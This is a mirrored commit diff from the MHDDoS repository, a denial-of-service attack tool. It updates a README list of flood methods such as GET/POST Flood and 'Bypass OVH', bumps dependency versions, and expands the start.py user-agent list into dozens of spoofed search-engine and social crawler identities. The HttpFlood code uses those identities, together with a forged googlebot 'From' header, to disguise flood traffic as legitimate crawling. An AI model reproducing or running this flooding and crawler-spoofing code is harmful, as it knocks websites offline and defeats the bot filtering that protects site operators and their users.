mirror of https://github.com/MatrixTM/MHDDoS.git
Merge branch 'main' into main
This commit is contained in:
commit
143450a68b
|
|
@ -19,7 +19,7 @@
|
||||||
|
|
||||||
* <img src="https://img.icons8.com/cotton/344/domain.png" width="16" height="16" alt="get"> GET | GET Flood
|
* <img src="https://img.icons8.com/cotton/344/domain.png" width="16" height="16" alt="get"> GET | GET Flood
|
||||||
* <img src="https://cdn0.iconfinder.com/data/icons/database-storage-5/60/server__database__fire__burn__safety-512.png" width="16" height="16" alt="post"> POST | POST Flood
|
* <img src="https://cdn0.iconfinder.com/data/icons/database-storage-5/60/server__database__fire__burn__safety-512.png" width="16" height="16" alt="post"> POST | POST Flood
|
||||||
* <img src="https://static-00.iconduck.com/assets.00/ovh-icon-2048x2048-l4c3izvg.png" width="16" height="16" alt="ovh"> OVH | Bypass OVH
|
* <img src="https://ovh.github.io/manager/ovhcloud-logo.webp" width="16" height="16" alt="ovh"> OVH | Bypass OVH
|
||||||
* <img src="https://cdn-icons-png.flaticon.com/512/1691/1691948.png" width="16" height="16" alt="ovh"> RHEX | Random HEX
|
* <img src="https://cdn-icons-png.flaticon.com/512/1691/1691948.png" width="16" height="16" alt="ovh"> RHEX | Random HEX
|
||||||
* <img src="https://cdn-icons-png.flaticon.com/512/4337/4337972.png" width="16" height="16" alt="ovh"> STOMP | Bypass chk_captcha
|
* <img src="https://cdn-icons-png.flaticon.com/512/4337/4337972.png" width="16" height="16" alt="ovh"> STOMP | Bypass chk_captcha
|
||||||
* <img src="https://cdn.iconscout.com/icon/premium/png-256-thumb/cyber-bullying-2557797-2152371.png" width="16" height="16" alt="stress"> STRESS | Send HTTP Packet With High Byte
|
* <img src="https://cdn.iconscout.com/icon/premium/png-256-thumb/cyber-bullying-2557797-2152371.png" width="16" height="16" alt="stress"> STRESS | Send HTTP Packet With High Byte
|
||||||
|
|
|
||||||
|
|
@ -1,5 +1,7 @@
|
||||||
cloudscraper==1.2.71
|
cloudscraper==1.2.71
|
||||||
requests==2.31.0
|
certifi==2024.7.4
|
||||||
|
dnspython==2.6.1
|
||||||
|
requests==2.32.4
|
||||||
impacket==0.10.0
|
impacket==0.10.0
|
||||||
psutil>=5.9.3
|
psutil>=5.9.3
|
||||||
icmplib>=2.1.1
|
icmplib>=2.1.1
|
||||||
|
|
|
||||||
78
start.py
78
start.py
|
|
@ -134,13 +134,73 @@ class Methods:
|
||||||
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
|
ALL_METHODS: Set[str] = {*LAYER4_METHODS, *LAYER7_METHODS}
|
||||||
|
|
||||||
|
|
||||||
google_agents = [
|
search_engine_agents = [
|
||||||
"Mozila/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
|
# ---------------- Google ----------------
|
||||||
"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, "
|
"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
|
||||||
"like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; "
|
"Googlebot/2.1 (+http://www.googlebot.com/bot.html)",
|
||||||
"+http://www.google.com/bot.html)) "
|
"Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Googlebot/2.1; "
|
||||||
"Googlebot/2.1 (+http://www.google.com/bot.html)",
|
"+http://www.google.com/bot.html) Chrome/103.0.5060.134 Safari/537.36",
|
||||||
"Googlebot/2.1 (+http://www.googlebot.com/bot.html)"
|
"Googlebot-Image/1.0",
|
||||||
|
"Googlebot-Video/1.0",
|
||||||
|
"Googlebot-News",
|
||||||
|
"AdsBot-Google (+http://www.google.com/adsbot.html)",
|
||||||
|
"AdsBot-Google-Mobile-Apps",
|
||||||
|
"AdsBot-Google-Mobile (+http://www.google.com/mobile/adsbot.html)",
|
||||||
|
"Mediapartners-Google",
|
||||||
|
"FeedFetcher-Google; (+http://www.google.com/feedfetcher.html)",
|
||||||
|
|
||||||
|
# ---------------- Bing / Microsoft ----------------
|
||||||
|
"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)",
|
||||||
|
"BingPreview/1.0b",
|
||||||
|
"AdIdxBot/2.0 (+http://www.bing.com/bingbot.htm)",
|
||||||
|
|
||||||
|
# ---------------- Yahoo ----------------
|
||||||
|
"Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)",
|
||||||
|
"Yahoo! Slurp China",
|
||||||
|
|
||||||
|
# ---------------- Yandex ----------------
|
||||||
|
"Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)",
|
||||||
|
"YandexMobileBot/3.0 (+http://yandex.com/bots)",
|
||||||
|
"YandexImages/3.0 (+http://yandex.com/bots)",
|
||||||
|
"YandexVideo/3.0 (+http://yandex.com/bots)",
|
||||||
|
"YandexNews/3.0 (+http://yandex.com/bots)",
|
||||||
|
|
||||||
|
# ---------------- Baidu ----------------
|
||||||
|
"Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
|
||||||
|
"Baiduspider-image (+http://www.baidu.com/search/spider.html)",
|
||||||
|
"Baiduspider-video (+http://www.baidu.com/search/spider.html)",
|
||||||
|
|
||||||
|
# ---------------- DuckDuckGo ----------------
|
||||||
|
"DuckDuckBot/1.0; (+http://duckduckgo.com/duckduckbot.html)",
|
||||||
|
"DuckDuckBot/2.0; (+http://duckduckgo.com/duckduckbot.html)",
|
||||||
|
|
||||||
|
# ---------------- Applebot ----------------
|
||||||
|
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 "
|
||||||
|
"(KHTML, like Gecko) Version/14.0 Safari/605.1.15 (Applebot/0.1; "
|
||||||
|
"+http://www.apple.com/go/applebot)",
|
||||||
|
|
||||||
|
# ---------------- Facebook / Social ----------------
|
||||||
|
"facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)",
|
||||||
|
"Facebot/1.0",
|
||||||
|
|
||||||
|
# ---------------- Twitter ----------------
|
||||||
|
"Twitterbot/1.0",
|
||||||
|
|
||||||
|
# ---------------- LinkedIn ----------------
|
||||||
|
"LinkedInBot/1.0 (+https://www.linkedin.com/)",
|
||||||
|
|
||||||
|
# ---------------- Pinterest ----------------
|
||||||
|
"Pinterest/0.2 (+http://www.pinterest.com/bot.html)",
|
||||||
|
|
||||||
|
# ---------------- Other Major Bots ----------------
|
||||||
|
"Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)",
|
||||||
|
"SemrushBot/7~bl (+http://www.semrush.com/bot.html)",
|
||||||
|
"MJ12bot/v1.4.8 (http://mj12bot.com/)",
|
||||||
|
"Sogou web spider/4.0 (+http://www.sogou.com/docs/help/webmasters.htm#07)",
|
||||||
|
"Exabot/3.0 (+http://www.exabot.com/go/robot)",
|
||||||
|
"SeznamBot/3.2 (http://napoveda.seznam.cz/seznambot-intro/)",
|
||||||
|
"CCBot/2.0 (+http://commoncrawl.org/faq/)",
|
||||||
|
"DotBot/1.1 (+http://www.opensiteexplorer.org/dotbot, help@moz.com)"
|
||||||
]
|
]
|
||||||
|
|
||||||
|
|
||||||
|
|
@ -942,14 +1002,14 @@ class HttpFlood(Thread):
|
||||||
"Host: %s\r\n" % self._target.raw_authority +
|
"Host: %s\r\n" % self._target.raw_authority +
|
||||||
"Connection: Keep-Alive\r\n"
|
"Connection: Keep-Alive\r\n"
|
||||||
"Accept: text/plain,text/html,*/*\r\n"
|
"Accept: text/plain,text/html,*/*\r\n"
|
||||||
"User-Agent: %s\r\n" % randchoice(google_agents) +
|
"User-Agent: %s\r\n" % randchoice(search_engine_agents) +
|
||||||
"Accept-Encoding: gzip,deflate,br\r\n\r\n"), str.encode(
|
"Accept-Encoding: gzip,deflate,br\r\n\r\n"), str.encode(
|
||||||
"GET /sitemap.xml HTTP/1.1\r\n"
|
"GET /sitemap.xml HTTP/1.1\r\n"
|
||||||
"Host: %s\r\n" % self._target.raw_authority +
|
"Host: %s\r\n" % self._target.raw_authority +
|
||||||
"Connection: Keep-Alive\r\n"
|
"Connection: Keep-Alive\r\n"
|
||||||
"Accept: */*\r\n"
|
"Accept: */*\r\n"
|
||||||
"From: googlebot(at)googlebot.com\r\n"
|
"From: googlebot(at)googlebot.com\r\n"
|
||||||
"User-Agent: %s\r\n" % randchoice(google_agents) +
|
"User-Agent: %s\r\n" % randchoice(search_engine_agents) +
|
||||||
"Accept-Encoding: gzip,deflate,br\r\n"
|
"Accept-Encoding: gzip,deflate,br\r\n"
|
||||||
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9),
|
"If-None-Match: %s-%s\r\n" % (ProxyTools.Random.rand_str(9),
|
||||||
ProxyTools.Random.rand_str(4)) +
|
ProxyTools.Random.rand_str(4)) +
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue